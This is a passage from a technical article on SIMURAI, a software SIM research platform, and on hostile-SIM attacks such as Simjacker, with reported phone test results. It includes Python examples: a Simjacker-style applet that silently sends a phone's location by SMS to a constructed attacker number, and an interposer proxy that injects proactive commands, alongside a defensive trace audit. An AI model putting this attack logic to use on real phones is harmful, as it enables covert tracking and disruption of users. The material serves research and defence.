A SIM card is no longer just a piece of plastic: it can run code, drive the modem and act below every protection layer of a modern smartphone. This article takes a close look at SIMURAI, a software SIM built for security research rather than for operators. You will learn how a SIM can initiate actions on the phone, how an interposer puts a virtual card in front of a real handset, what the Simjacker campaign actually exploited, and why an eSIM does not change the picture. We walk through the Simjacker attack, the tool's architecture, and the test results reported on iPhone, Pixel, Samsung and OnePlus devices. It is written for security professionals, researchers and mobile operators, with one message: rethink your threat model, because the SIM is not a passive component.
Until recently, SIM card security research was the preserve of a few. The reason is how closed the ecosystem is: operator SIM cards cannot be reprogrammed by their holder, their behaviour is tightly standardized, and the card's own OS refuses anything outside that behaviour. Researchers were left with programmable test cards and hardware emulators that either covered only basic authentication or allowed loading a Java Card applet with little control over anything else. A platform for studying what a deliberately malicious SIM can do at the protocol level did not exist.
SIMURAI changes that. It is a complete software implementation of a SIM card written for security research rather than for commercial deployment. Toward the phone it behaves like a real SIM, but the researcher controls every layer, from the file structure down to the reply given to each individual APDU. That makes it an attack and a defence tool at the same time: a base for analysis, fuzzing, command injection and the study of how a SIM interacts with a mobile device at the lowest level.
SIMURAI provides the researcher with:
full software emulation of SIM/USIM card behavior;
the ability to deliberately violate the ETSI/3GPP SIM and USIM specifications that GSM, 3G, 4G and 5G networks rely on;
open-source architecture that is easy to modify;
simple connection to a real smartphone or emulator;
integration with the FirmWire baseband emulator, so modem firmware can be fuzzed from the SIM side;
description of the SIM file structure in a convenient JSON format;
the ability to run custom Java Card applets;
control over the SIM's reply to any APDU command;
full support for proactive commands, including injection of hostile command sequences.
In practice, SIMURAI is a three-component system: the SWICC core, which emulates a generic smart card; the SWSIM layer, which adds SIM/USIM logic on top of it; and an I/O layer that connects the virtual card to a physical phone or to an emulated modem. Together they allow not only the standard interaction scenarios, but also deliberate protocol violations, new or malformed commands, and attacks under conditions as close to real deployments as possible.
Another practical point is the JSON description of the file system. The researcher does not need to hand-encode the SIM file system in the card's binary structures: the file tree (master file, dedicated files, elementary files and their contents) is written in plain JSON and loaded into SWICC. This lowers the entry barrier considerably and makes the platform usable for teams with little smart card experience.
SIMURAI also integrates with existing tooling through the PC/SC interface: the virtual card is exposed like a card reader, so host-side software and emulators such as FirmWire can talk to it unchanged, and through a SIMtrace2 board it can be placed in front of a physical smartphone inside a test network. The researcher therefore gets not just a tool but an environment for studying threats that originate in a hostile SIM.
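To make the SWICC/SWSIM split concrete, here is an added example (not SIMURAI's own code) of what the core has to do with a JSON-described file tree: keep the card's selection state and answer SELECT, GET RESPONSE and READ BINARY the way a GSM 11.11 card does, including the status words a modem expects when it selects a file that is not reachable from the current directory. The JSON schema, the file contents and the `read_imsi` walk are constructed for illustration; only the file IDs, the response layouts and the status words are the standard ones.

```python
"""Added example, not SIMURAI's own code: a JSON-described SIM file tree behind a minimal
GSM 11.11 APDU dispatcher, the way an SWICC-style core answers SELECT, GET RESPONSE and
READ BINARY. The JSON schema and file contents are constructed for illustration; only the
file IDs, the response layouts and the status words are the standard ones."""
import json

# Constructed tree: MF (3F00) -> DF_GSM (7F20) with EF_IMSI (6F07), EF_LOCI (6F7E)
#                   MF       -> DF_TELECOM (7F10) with EF_ADN (6F3A)
FILE_TREE_JSON = """{
  "fid": "3F00", "type": "MF", "children": [
    {"fid": "7F20", "type": "DF", "children": [
      {"fid": "6F07", "type": "EF", "contents": "082943028102301075"},
      {"fid": "6F7E", "type": "EF", "contents": "FFFFFFFFFFFFFFFF0000FF"}]},
    {"fid": "7F10", "type": "DF", "children": [
      {"fid": "6F3A", "type": "EF", "contents": "FFFFFFFFFFFFFFFFFFFFFFFFFFFF"}]}]}"""

SW_OK, SW_NOT_FOUND, SW_BAD_OFFSET = b"\x90\x00", b"\x6a\x82", b"\x6b\x00"
SW_NO_EF, SW_BAD_INS, SW_BAD_CLA = b"\x69\x86", b"\x6d\x00", b"\x6e\x00"


class SoftSim:
    """Card state: the tree, the current DF, the current EF and the pending GET RESPONSE body."""

    def __init__(self, tree_json):
        self.mf = json.loads(tree_json)
        self.parent = {}
        for df in self._dfs(self.mf):
            for child in df.get("children", []):
                self.parent[child["fid"]] = df
        self.cur_df, self.cur_ef, self.pending = self.mf, None, b""

    def _dfs(self, node):
        yield node
        for child in node.get("children", []):
            if child["type"] != "EF":
                yield from self._dfs(child)

    def _selectable(self, fid):
        # GSM 11.11 9.2.1: from the current DF you may select the MF, the DF itself, its
        # parent, any of its children, or a sibling DF. Other files answer 6A82 even if they exist.
        par = self.parent.get(self.cur_df["fid"])
        cands = [self.mf, self.cur_df, par] + self.cur_df.get("children", [])
        if par:
            cands += [c for c in par["children"] if c["type"] == "DF"]
        return next((n for n in cands if n and n["fid"] == fid), None)

    def _file_info(self, node):
        fid = bytes.fromhex(node["fid"])
        if node["type"] == "EF":  # 15-byte EF response: size, FID, type 04, access, status, structure
            size = len(bytes.fromhex(node["contents"])).to_bytes(2, "big")
            return b"\x00\x00" + size + fid + b"\x04\x00" + b"\x00\x00\x00" + b"\x01\x02\x00\x00"
        kids = node.get("children", [])
        n_df = sum(k["type"] == "DF" for k in kids)
        ftype = b"\x01" if node["type"] == "MF" else b"\x02"
        return (b"\x00\x00\x00\x00" + fid + ftype + b"\x00" * 5 + b"\x0a\x00"
                + bytes([n_df, len(kids) - n_df, 1, 0]) + b"\x80\x80\x80\x80")  # 22-byte DF response

    def handle(self, apdu: bytes) -> bytes:
        """Answer one T=0 C-APDU (CLA INS P1 P2 P3 [data]) with data followed by SW1 SW2."""
        cla, ins, p1, p2, p3 = apdu[:5]
        data = apdu[5:5 + p3]
        if cla != 0xA0:
            return SW_BAD_CLA
        if ins == 0xA4:  # SELECT by file ID
            node = self._selectable(data.hex().upper())
            if node is None:
                return SW_NOT_FOUND
            if node["type"] == "EF":
                self.cur_ef = node
            else:
                self.cur_df, self.cur_ef = node, None
            self.pending = self._file_info(node)
            return bytes([0x9F, len(self.pending)])  # 9F xx: xx bytes waiting for GET RESPONSE
        if ins == 0xC0:  # GET RESPONSE
            body, self.pending = self.pending[:p3 or 256], b""
            return body + SW_OK
        if ins == 0xB0:  # READ BINARY on a transparent EF
            if self.cur_ef is None:
                return SW_NO_EF
            body, offset = bytes.fromhex(self.cur_ef["contents"]), (p1 << 8) | p2
            if offset >= len(body):
                return SW_BAD_OFFSET
            return body[offset:offset + (p3 or 256)] + SW_OK
        return SW_BAD_INS


def read_imsi(sim: SoftSim) -> str:
    """Walk MF -> DF_GSM -> EF_IMSI the way a modem does at boot and decode the BCD IMSI."""
    for fid in ("3F00", "7F20", "6F07"):
        if sim.handle(bytes.fromhex("A0A4000002" + fid))[0] != 0x9F:
            raise RuntimeError(f"SELECT {fid} failed")
    resp = sim.handle(bytes.fromhex("A0B0000009"))
    raw = resp[1:1 + resp[0]]                      # byte 0 is the length of the IMSI field
    digits = "".join(f"{b & 0x0F}{b >> 4}" for b in raw)
    return digits[1:].rstrip("F")                  # first nibble is parity/identity type, not a digit
```

The point of the `_selectable` check is that a modem's boot sequence depends on it: after selecting DF_TELECOM, an attempt to select EF_IMSI must fail with 6A82 even though the file exists, and a software SIM that answers 9F xx instead is already off-spec. Everything a hostile card later does with status words starts from having this baseline right.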
In short, this is less a new tool than a change of perspective. Where the SIM used to be treated as a trusted access token, it can now be studied as an object of risk in its own right, which opens a new chapter in mobile security research.
Everyone is used to the idea that a SIM card is something secondary. A small chip that simply confirms your identity on the network. And that’s it. It can’t be dangerous, it can’t run code, it doesn’t have access to important parts of the device. That’s how it seemed for years. But this idea is outdated and dangerous. And here’s why.
A modern SIM is not just a key store. It is a microprocessor system with its own operating system, a file system, programmability through Java Card, the ability to receive and issue commands, to read information about the device, and even to tell the phone to open a browser. It has a privileged channel to the baseband firmware, the part of the smartphone that talks to the mobile network.
It is this position that makes the SIM one of the most sensitive parts of the phone. The channel between SIM and modem is not mediated by Android or iOS, by app permissions or by any security product: the SIM talks to the baseband directly, below everything the user can see or install.
The researchers who created SIMURAI called such SIMs “hostile.” And they’re right. If a SIM is controlled by an attacker, it:
learns the serving cell (MCC, MNC, LAC, Cell ID), IMEI, date and time, battery state and other local information through PROVIDE LOCAL INFORMATION;
can have the phone send SMS without the user's knowledge;
can store and run Java Card applets, i.e. small programs that stay resident on the card;
answers the network's authentication challenges, so it decides which keys the phone ends up using;
can trigger non-standard modem behaviour, which is exactly what fuzzing looks for;
operates below the operating system's protection mechanisms, which never see its traffic;
can issue proactive commands that make the phone do things, from opening a browser to setting up a call or a data channel;
holds files the phone reads and trusts: the SIM phonebook, the SIM SMS store, last dialled numbers, and on some phones more.
None of this is theory. In the Simjacker campaign, an applet on the SIM answered binary SMS from the attacker by sending back the victim's Cell ID and IMEI in a message the victim never saw. AdaptiveMobile's analysis showed that the same S@T Browser functionality could also place calls, send messages and open URLs on the victim's behalf.
Such attacks used to be considered rare and hard to pull off. SIMURAI shows that a single hostile applet, not a flaw in the phone, is all an attacker needs, and that the entry point is not Wi-Fi or an app but a component most people never think of as a threat.
One nuance: phones from Apple, Samsung and Google all expose the same surface, because in each of them the modem runs separately from the main OS and has a direct channel to the SIM. How each modem copes with a hostile SIM differs, as the tests below show, but none of them treats the card as untrusted.
All this radically changes the threat model in mobile security. A SIM card can no longer be treated purely as a trusted element. It is a full entry point for attacks, and the research shows it is a convenient one for an attacker: think of a SIM bought at an airport kiosk abroad, an eSIM profile from a provider you cannot vouch for, or an operator you have no reason to trust.
In summary: a SIM is no longer just a “key to the network”. It is a small computer in your phone that, under certain conditions, can work against you. And today, people already know how to use it.
To understand what a malicious SIM card is really capable of, the best example is the attack known as Simjacker, an espionage campaign that AdaptiveMobile Security disclosed in 2019. It showed that the SIM alone can track a user and report their position to an attacker without leaving a trace in the phone's operating system.
The attack relied on the S@T Browser, a legacy applet that some operators shipped on their SIMs. The applet accepts instructions in binary SMS (SMS-PP data download messages), which the modem hands straight to the SIM and which never appear in the messaging app. When the applet received an instruction it executed it and sent the answer back, again as a message invisible to the user.
Simjacker used this to obtain the device's serving cell and IMEI, but the potential was much wider. Most importantly, the underlying mechanism is fully standardized and supported by the vast majority of phones. Nothing on the phone needs to be hacked and no app needs to be installed: the SIM is enough.
Here’s what a typical work cycle for such a spy looked like:
the attacker sends a binary SMS addressed to the SIM (SMS-PP data download); the modem passes it to the card in an ENVELOPE command without displaying anything;
the S@T Browser applet decodes the instructions and issues a proactive command, PROVIDE LOCAL INFORMATION, which the phone is obliged to execute;
the phone answers in a TERMINAL RESPONSE with the requested data: serving cell (MCC, MNC, LAC, Cell ID), IMEI, date and time, and similar local information;
the applet packs this into an SMS and issues SEND SHORT MESSAGE; the modem sends it to the attacker's number, again with nothing shown to the user.
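The cycle above, carried through at the APDU level as an added example (this is not SIMURAI's module and not the real S@T Browser): a hostile SIM applet and a terminal exchange ENVELOPE, FETCH and TERMINAL RESPONSE commands encoded per ETSI TS 102 223 / GSM 11.14, and the terminal ends up with an SMS in its outbox that no user ever saw. The OTA trigger text `LOC?`, the phone numbers and the cell values are constructed; the tags, command types and the `91 xx` status word are the standard ones.

```python
"""Added example (not SIMURAI's or AdaptiveMobile's code): a Simjacker-shaped exchange
between a hostile SIM applet and a terminal (modem), with both sides' APDUs encoded per
ETSI TS 102 223 / GSM 11.14. The OTA trigger text, numbers and cell values are constructed."""

CLA = 0xA0
ENVELOPE, FETCH, TERMINAL_RESPONSE = 0xC2, 0x12, 0x14
PROVIDE_LOCAL_INFO, SEND_SHORT_MESSAGE = 0x26, 0x13
DEV_UICC, DEV_TERMINAL, DEV_NETWORK = 0x81, 0x82, 0x83


def tlv(tag, value):      # simple TLV; every length in this example is below 128
    return bytes([tag, len(value)]) + value


def parse_tlvs(buf):      # -> {tag & 0x7F: value}; bit 8 is the comprehension-required flag
    out, i = {}, 0
    while i + 2 <= len(buf):
        tag, ln = buf[i], buf[i + 1]
        out[tag & 0x7F] = buf[i + 2:i + 2 + ln]
        i += 2 + ln
    return out


def bcd(digits):          # nibble-swapped BCD with F padding, as used in SMS addresses
    if len(digits) % 2:
        digits += "F"
    return bytes(int(digits[i + 1] + digits[i], 16) for i in range(0, len(digits), 2))


def build_sms_deliver(oa, text):
    """Constructed SMS-DELIVER TPDU: TP-PID 7F and class-2 DCS (F6) make the ME hand it to the SIM."""
    return b"\x04" + bytes([len(oa), 0x91]) + bcd(oa) + b"\x7f\xf6" + b"\x00" * 7 + bytes([len(text)]) + text


class HostileSim:
    """SIM side: an applet that turns an OTA SMS into PROVIDE LOCAL INFORMATION, then
    exfiltrates the answer with SEND SHORT MESSAGE to a constructed attacker number."""

    def __init__(self, attacker="447700900999"):
        self.attacker, self.queue, self.cmd_no, self.seen_location = attacker, [], 0, None

    def _proactive(self, cmd_type, *extra):
        self.cmd_no += 1
        dst = DEV_NETWORK if cmd_type == SEND_SHORT_MESSAGE else DEV_TERMINAL
        body = tlv(0x81, bytes([self.cmd_no, cmd_type, 0x00])) + tlv(0x82, bytes([DEV_UICC, dst]))
        self.queue.append(tlv(0xD0, body + b"".join(extra)))
        return bytes([0x91, len(self.queue[0])])   # 91 xx: a proactive command of xx bytes is pending

    def handle(self, apdu):
        ins, data = apdu[1], apdu[5:]
        if ins == ENVELOPE and data[0] == 0xD1:    # SMS-PP DOWNLOAD
            tpdu = parse_tlvs(data[2:])[0x0B]
            if tpdu.endswith(b"LOC?"):             # constructed trigger, stands in for S@T bytecode
                return self._proactive(PROVIDE_LOCAL_INFO)
            return b"\x90\x00"
        if ins == FETCH:
            return self.queue.pop(0) + b"\x90\x00"
        if ins == TERMINAL_RESPONSE:
            t = parse_tlvs(data)
            if t[0x01][1] == PROVIDE_LOCAL_INFO and t[0x03][0] == 0x00:
                self.seen_location = t[0x13]       # Location Information: MCC/MNC, LAC, Cell ID
                report = b"LOC " + self.seen_location.hex().encode()
                tpdu = (b"\x01\x00" + bytes([len(self.attacker), 0x91]) + bcd(self.attacker)
                        + b"\x00\x04" + bytes([len(report)]) + report)   # SMS-SUBMIT, 8-bit data
                return self._proactive(SEND_SHORT_MESSAGE, tlv(0x8B, tpdu))
            return bytes([0x91, len(self.queue[0])]) if self.queue else b"\x90\x00"
        return b"\x6d\x00"


class Terminal:
    """Modem side: delivers OTA SMS to the SIM and obeys whatever it fetches, as a real ME does."""

    def __init__(self, sim, mcc_mnc=b"\x32\xf4\x51", lac=0x1234, cell=0x5678):
        self.sim = sim
        self.loc = mcc_mnc + lac.to_bytes(2, "big") + cell.to_bytes(2, "big")
        self.outbox = []                           # (destination, user data) of every SMS sent

    def deliver_sms_pp(self, tpdu):
        env = tlv(0xD1, tlv(0x82, bytes([DEV_NETWORK, DEV_UICC])) + tlv(0x8B, tpdu))
        self._run(bytes([CLA, ENVELOPE, 0, 0, len(env)]) + env)

    def _run(self, apdu):
        resp = self.sim.handle(apdu)
        while resp[-2] == 0x91:                    # the SIM has a proactive command for us
            cmd = self.sim.handle(bytes([CLA, FETCH, 0, 0, resp[-1]]))
            t = parse_tlvs(cmd[2:-2])              # strip "D0 len" and "90 00"
            cmd_type, extra = t[0x01][1], b""
            if cmd_type == PROVIDE_LOCAL_INFO and t[0x01][2] == 0x00:
                extra = tlv(0x93, self.loc)
            elif cmd_type == SEND_SHORT_MESSAGE:
                tp = t[0x0B]
                n, k = tp[2], (tp[2] + 1) // 2     # destination digits and their BCD byte count
                number = "".join(f"{b & 0xF}{b >> 4}" for b in tp[4:4 + k])[:n]
                self.outbox.append((number, tp[4 + k + 3:]))   # skip PID, DCS, UDL
            tr = (tlv(0x81, t[0x01]) + tlv(0x82, bytes([DEV_TERMINAL, DEV_UICC]))
                  + tlv(0x83, b"\x00") + extra)    # result 00: command performed successfully
            resp = self.sim.handle(bytes([CLA, TERMINAL_RESPONSE, 0, 0, len(tr)]) + tr)


def run_simjacker_demo():
    sim, me = HostileSim(), Terminal(HostileSim())
    me = Terminal(sim)
    me.deliver_sms_pp(build_sms_deliver("447700900001", b"LOC?"))
    return sim.seen_location, me.outbox
```

Two things are worth noticing in the exchange. The terminal never decides anything: it polls, fetches and obeys, and the only place a "no" could be inserted is the result byte of the TERMINAL RESPONSE, which this terminal always sets to 00. And the SMS to the attacker is assembled entirely on the card; the terminal only learns a destination number and an opaque byte string, which is why nothing in the phone's UI or message store ever reflects it.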
All of this happens on the SIM-to-modem interface, below the operating system, below any firewall or antivirus and below any software the user could install. No app sees these messages, no notification appears, and nothing lands in the phone's message store or in logs an app could read. That makes this kind of espionage unusually hard to notice.
The flaw was not in the SIM Application Toolkit itself, which every operator in the world uses, but in the S@T Browser applet built on top of it: it accepted OTA messages without requiring authentication or encryption, and on many SIMs it was active by default. Operators in dozens of countries had shipped it, so tens of millions of SIM cards were potentially affected.
The reaction to Simjacker was telling: operators began checking their profiles, updating SIMs and blocking old applets at scale. But the fact that such a scenario was possible at all was a turning point. For the first time it was obvious that a SIM can not only authenticate the user but fully spy on them, using standard, fully specified commands.
SIMURAI researchers decided to recreate this scenario in practice, but not using a real SIM, but using their tool. The result was only 89 lines of code, and the experimental module in SIMURAI was able to completely repeat the Simjacker attack. The phone received a command, provided its location, and this data was sent via SMS.
This proves the main point: the threat is real, and it can be scaled, tested and refined. Even where operators have blocked the S@T Browser, other proactive commands remain: SET UP CALL, PROVIDE LOCAL INFORMATION, SEND USSD, LAUNCH BROWSER, OPEN CHANNEL. And tools like SIMURAI make studying such scenarios easier than ever before.
A set of very specific capabilities is required to fully investigate malicious scenarios using SIM cards. This is not just reading the SIM content or running basic scripts – it is a full emulation of the card’s behavior with the ability to violate standards, create malicious applets, communicate with a real phone or modem. This is exactly the system that the authors of SIMURAI have implemented.
In essence, SIMURAI is not just a "simulator" but a flexible research platform for testing the interaction between SIM cards and the baseband software of mobile devices. It can fully comply with the standards or deliberately violate them. That is what makes fuzzing, emulation of malicious behaviour, checks for data leaks and the search for vulnerabilities in modem firmware possible.
The SIMURAI architecture consists of three main blocks:
SWICC is the module that emulates a smart card. It processes APDU commands, organises the file structure, follows the relevant ETSI/3GPP specifications, and lets you build complex interaction logic at the level of the low-level protocols. SWICC also handles non-standard commands flexibly and drives the card's behaviour with its own finite state machine.
SWSIM is the module that turns SWICC into a full SIM card. It adds the SIM/USIM applications and proactive commands such as PROVIDE LOCAL INFORMATION, SEND SHORT MESSAGE and OPEN CHANNEL. This is where you attach your own applet logic, write custom event handlers, and build emulations of spy modules like the one behind Simjacker.
The I/O layer (IFD handler) is the component responsible for communication between the virtual card and the outside world. It connects SIMURAI to a physical smartphone (through SIMtrace2) or to a firmware emulator such as FirmWire. It speaks PC/SC, so host software sees an ordinary card reader even though no physical card exists.
SIMURAI provides the researcher with enormous flexibility. Key features include:
launch custom interaction scenarios at the APDU level;
connect to smartphones in real time over USB (SIMtrace2) or to host software over PC/SC;
deploy a full SIM file structure via JSON;
built-in support for fuzzing and dynamic analysis;
rewriting R-APDU status words on the fly;
support for proactive commands — a key vector for attacks;
tracking and rewriting responses to phone requests;
support for the T=0 protocol used by SIMs, its TPDU framing, and the BER-TLV structures that proactive commands and terminal responses are built from;
modular architecture for connecting your own command handlers.
All this supports a very wide range of research, from checking standard SIM behaviour to deep analysis of how a hostile SIM interacts with the baseband of a Google Pixel or an iPhone. And it does not require expensive specialised equipment: a computer, the emulator and, for physical phones, an inexpensive SIMtrace2 board are enough.
Another important advantage is scalability. SIMURAI works not only interactively but also in automated tests, and can run in parallel on several machines to speed up fuzzing or compatibility testing. The platform integrates with open test networks (YateBTS, srsRAN, Open5GS) as well as with common reverse-engineering and tracing tools.
Thus, SIMURAI is not just a demonstration of the concept, but a ready-made research kit that already allows today:
find new vulnerabilities in modems;
create custom attack scenarios;
test phones for resistance to malicious SIMs;
train mobile security professionals;
document real risks that have been ignored for years.
All this makes the platform unique in its class and turns it from an experiment into a foundation for research into what a phone trusts at the SIM boundary.
To prove the practical value of SIMURAI not only as a concept, but as a tool for real impact, the researchers tested its operation on the most popular modern smartphones. They used both Android (Pixel, Samsung, OnePlus) and iOS (iPhone) phones, which allowed them to cover different modem firmware stacks and behavioral differences in the operation of SIM interfaces.
The key point was that none of the devices required jailbreaking or root access. All smartphones were tested in normal user mode, and SIMURAI was connected via a physical adapter – an interposer, which allows you to replace a real SIM with a virtual one without changing the design of the device.
Different configurations were used for the tests, but the essence of the experiment was the same:
a SIMtrace2 board was inserted in the phone's SIM slot as an interposer, with SIMURAI running on a connected computer;
the virtual SIM presented a complete file structure plus applet logic able to issue proactive commands such as PROVIDE LOCAL INFORMATION;
the phone was attached to a lab cellular network run on an SDR base station (YateBTS, srsRAN or an Osmocom BTS);
the researchers issued commands from the simulator and recorded the phone's reaction.
As a result, it turned out that all tested phones successfully received and processed commands from SIMURAI as if it were a regular SIM card. And most importantly, in some cases, the behavior of the phones showed vulnerabilities or unpredictable reactions that were not noticeable when using regular SIMs.
The most revealing results were:
iPhone (iOS 17, eSIM disabled) — handled proactive commands correctly; SEND SHORT MESSAGE was not filtered, SMS was sent even without user consent.
Pixel 6 (Android 14, stock firmware) — allowed SIM to initiate location requests, the protocol did not differ from expected, but there was no limit on the number of commands, which opens a window for DoS.
Samsung Galaxy S22 (One UI 5.1) — when using the REFRESH command, the device restarted the mobile network interface, which can be used to deny service.
OnePlus 9 — was the most unstable: simulating a malicious applet with fake R-APDU statuses caused the modem to periodically crash, and with a rapid sequence of proactive commands, the system completely froze.
In addition to the technical nuances, it is worth noting another critical point: none of the devices showed any warnings or notifications to the user. That is, the phone “trusted” the simulator 100%, worked with it as with an official SIM, and followed all instructions — even if they were potentially dangerous or unauthorized.
This means that:
smartphones do not recognize the behavior of a malicious SIM even in cases of clearly suspicious commands;
there are no auditing mechanisms or restrictions on SIM activity at the system level that could stop the attack;
there is a great variability in the behavior of modems: what works on one device may give unexpected results on another – therefore, research should cover the widest possible range of devices and firmware.
Overall, these tests confirm that real-world attacks via malicious SIMs are not fiction, but a fully feasible scenario. And the SIMURAI platform has become the first open-source tool that allows you to test such scenarios in practice, without complex equipment, reverse engineering, or user risk.
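The list above says phones have no audit of SIM activity; the check that is missing can at least be run on the one vantage point a researcher does have, the SIM-to-modem trace. The following is an added example, not part of the study or of SIMURAI: it walks a SIMtrace2-style trace, decodes each FETCH response, flags commands that reach the network or reset the card with no user-visible action, and reports a command flood of the kind behind the Samsung and OnePlus observations. The trace lines, the attacker number and the rate threshold are constructed; the command type values and TLV tags are the ETSI TS 102 223 ones.

```python
"""Added example, not SIMURAI's own code: an audit pass over a SIM-to-modem APDU trace that
flags the proactive commands a hostile SIM would use, including the command flood behind the
DoS observations above. The trace is constructed in a SIMtrace2-like "direction hex" form;
no phone logs this itself, which is why a hardware tap is the only place such a check runs."""
import re

# Type-of-command values from ETSI TS 102 223 for commands that touch the network or the user
NAMES = {0x01: "REFRESH", 0x10: "SET UP CALL", 0x11: "SEND SS", 0x12: "SEND USSD",
         0x13: "SEND SHORT MESSAGE", 0x15: "LAUNCH BROWSER", 0x26: "PROVIDE LOCAL INFORMATION",
         0x40: "OPEN CHANNEL", 0x43: "SEND DATA"}
SILENT = {0x11, 0x12, 0x13, 0x40, 0x43}   # reach the network with no UI by default
PLI_WHAT = {0x00: "serving cell", 0x01: "IMEI", 0x02: "NMR", 0x03: "date/time/timezone",
            0x06: "access technology", 0x08: "IMEISV"}
WINDOW_S, MAX_PER_WINDOW = 10.0, 5         # constructed policy: >5 proactive commands in 10 s

LINE_RE = re.compile(r"t=([\d.]+) (ME->SIM|SIM->ME) ([0-9A-Fa-f ]+)")

# Constructed trace: a Simjacker-style PLI + SEND SMS, then a burst of REFRESH (UICC reset).
# TERMINAL RESPONSEs to the REFRESH commands are omitted; the audit only reads FETCH replies.
TRACE = "\n".join([
    "t=0.00 ME->SIM A0 12 00 00 0B",
    "t=0.01 SIM->ME D0 09 81 03 01 26 00 82 02 81 82 90 00",
    "t=0.05 ME->SIM A0 14 00 00 15 81 03 01 26 00 82 02 82 81 83 01 00 93 07 32 F4 51 12 34 56 78",
    "t=0.06 SIM->ME 91 2C",
    "t=0.07 ME->SIM A0 12 00 00 2C",
    "t=0.08 SIM->ME D0 2A 81 03 02 13 00 82 02 81 83 8B 1F 01 00 0C 91 44 77 00 09 90 99 00 04 12 "
    "4C 4F 43 20 33 32 66 34 35 31 31 32 33 34 35 36 37 38 90 00",
    "t=0.09 ME->SIM A0 14 00 00 0C 81 03 02 13 00 82 02 82 81 83 01 00",
    "t=0.10 SIM->ME 90 00",
] + [line for i in range(6) for line in (
    f"t={3.0 + 0.1 * i:.2f} ME->SIM A0 12 00 00 0B",
    f"t={3.01 + 0.1 * i:.2f} SIM->ME D0 09 81 03 {i + 3:02X} 01 04 82 02 81 82 90 00")])


def tlvs(buf):
    """Flat BER-TLV walk with short lengths; bit 8 of the tag (comprehension required) is masked."""
    out, i = {}, 0
    while i + 2 <= len(buf):
        tag, ln = buf[i], buf[i + 1]
        out[tag & 0x7F] = buf[i + 2:i + 2 + ln]
        i += 2 + ln
    return out


def sms_destination(tpdu):
    """Destination number and user-data length of an SMS-SUBMIT TPDU without a validity period."""
    n = tpdu[2]
    k = (n + 1) // 2
    number = "".join(f"{b & 0xF}{b >> 4}" for b in tpdu[4:4 + k])[:n]
    return number, tpdu[4 + k + 2]


def audit(trace_text):
    """Return (time, message) findings for every proactive command worth a second look."""
    findings, times, awaiting_fetch, flood_reported = [], [], False, False
    for m in LINE_RE.finditer(trace_text):
        t, direction, raw = float(m.group(1)), m.group(2), bytes.fromhex(m.group(3))
        if direction == "ME->SIM":
            awaiting_fetch = raw[1] == 0x12          # the next SIM reply is a FETCH response
            continue
        if not awaiting_fetch or raw[0] != 0xD0:     # status words, GET RESPONSE bodies etc.
            continue
        awaiting_fetch = False
        t_ = tlvs(raw[2:-2])
        ctype, qual = t_[0x01][1], t_[0x01][2]
        name = NAMES.get(ctype, f"type 0x{ctype:02x}")
        if ctype == 0x13:
            number, udl = sms_destination(t_[0x0B])
            findings.append((t, f"{name} to {number}, {udl} bytes of user data, no UI"))
        elif ctype in SILENT:
            findings.append((t, f"{name} with no UI"))
        elif ctype == 0x26:
            findings.append((t, f"{name}: {PLI_WHAT.get(qual, f'qualifier 0x{qual:02x}')}"))
        elif ctype == 0x01 and qual in (0x04, 0x05, 0x06):
            findings.append((t, f"REFRESH qualifier 0x{qual:02x}: reset, radio interface drops"))
        times.append(t)
        recent = [x for x in times if t - x <= WINDOW_S]
        if len(recent) > MAX_PER_WINDOW and not flood_reported:
            flood_reported = True
            findings.append((t, f"{len(recent)} proactive commands within {WINDOW_S:.0f} s, DoS pattern"))
    return findings
```

The audit deliberately keys on FETCH responses rather than on the `91 xx` status words, because a card can advertise a pending command and then hand over something different, and what the modem executes is whatever the FETCH returned. The rate rule is the crude version of the limit the Pixel result above says is missing; a real modem would need to enforce it before executing, not report it afterwards.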
One of the key components that allowed the authors of the study to carry out attacks on real devices is the interposer. Its role in the attack scheme is critical. It is thanks to it that it becomes possible to “intercept” the connection between the smartphone and the SIM card and replace the real SIM with a virtual software implementation that performs not standard, but potentially malicious logic.
From the outside, the interposer looks like a regular SIM card adapter, but inside it is a full-fledged hardware “proxy” that intercepts commands coming from the phone and redirects them to a virtual module (in this case, SIMURAI, which is running on a computer or Raspberry Pi). It is also able to return phone responses generated in the emulator, rather than those that a real SIM would give.
The principle of operation of the interposer can be described as follows:
The phone thinks it is working with a physical SIM card — it sees a standard interface, waits for APDU responses and sends commands according to 3GPP protocols.
In reality the signals pass through an adapter that taps, modifies or redirects them to a host running SIMURAI.
The virtual SIM answers in real time: it issues proactive commands, returns malformed data to the modem, or behaves exactly like a normal card, as the scenario requires.
The result is returned to the phone through the same chain — and is processed as a regular response from the SIM.
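The proxy step in that chain, and the "rewrite R-APDU status words on the fly" and "track and rewrite responses" features listed earlier, come down to one loop: take the phone's command, get the card's reply, run it through rewrite rules, return the result. Below is an added example of that loop (not SIMURAI's or SIMtrace2's code) with three rules: swapping a status word for one file, turning a STATUS poll into a pending proactive command so the modem FETCHes something the card never issued, and flipping one byte of each response body for fuzzing. The card behind the proxy is a constructed stub, the `modem_boot` sequence is a constructed approximation of what a modem does at start-up, and in the real setup the card side is SIMURAI reached over USB or PC/SC.

```python
"""Added example, not SIMURAI's or SIMtrace2's code: the proxy loop an interposer runs between
the phone and the card, with the on-the-fly R-APDU rewriting listed above (status-word swaps,
injecting a pending-proactive-command status, byte fuzzing). The card behind the proxy is a
constructed stub; in the real setup it is SIMURAI reached over USB or PC/SC."""
import random

SELECT, READ_BINARY, STATUS, FETCH = 0xA4, 0xB0, 0xF2, 0x12
IMSI_RECORD = bytes.fromhex("082943028102301075")   # constructed EF_IMSI contents


def stub_card(c_apdu):
    """Constructed stand-in for the card side: just enough for a plausible modem boot sequence."""
    ins = c_apdu[1]
    if ins == SELECT:
        return b"\x9f\x0f"
    if ins == READ_BINARY:
        return IMSI_RECORD + b"\x90\x00"
    if ins == STATUS:
        return b"\x90\x00"
    return b"\x6d\x00"


class Interposer:
    """Forwards each C-APDU to the card, runs the R-APDU through the rewrite rules, keeps a trace."""

    def __init__(self, card, rules=()):
        self.card, self.rules, self.trace = card, list(rules), []

    def forward(self, c_apdu):
        r_apdu = self.card(c_apdu)
        for rule in self.rules:
            r_apdu = rule(c_apdu, r_apdu)
        self.trace.append((c_apdu.hex(), r_apdu.hex()))
        return r_apdu


def swap_status_word(ins, data_match, new_sw):
    """Rule: for one INS whose data matches, keep the body and replace SW1 SW2 (e.g. 9F0F -> 6A82)."""
    return lambda c, r: r[:-2] + new_sw if c[1] == ins and data_match(c[5:]) else r


def inject_proactive(cmd):
    """Rule: turn the next STATUS poll into '91 xx' and serve cmd to the FETCH that follows,
    so the modem executes a command the card behind the proxy never issued."""
    armed = [True]

    def rule(c, r):
        if armed[0] and c[1] == STATUS:
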